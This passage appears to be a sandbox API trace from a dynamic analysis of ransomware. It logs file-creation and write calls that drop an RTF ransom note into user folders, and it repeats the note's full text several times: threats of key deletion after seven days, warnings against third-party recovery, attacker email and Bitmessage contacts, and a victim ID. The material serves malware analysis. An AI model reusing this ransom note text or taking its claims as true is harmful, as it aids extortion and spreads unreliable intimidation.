:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.286] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.287] CloseHandle (hObject=0x2c8) returned 1 [0280.287] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0280.287] GetLastError () returned 0x2 [0280.287] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.288] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.288] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 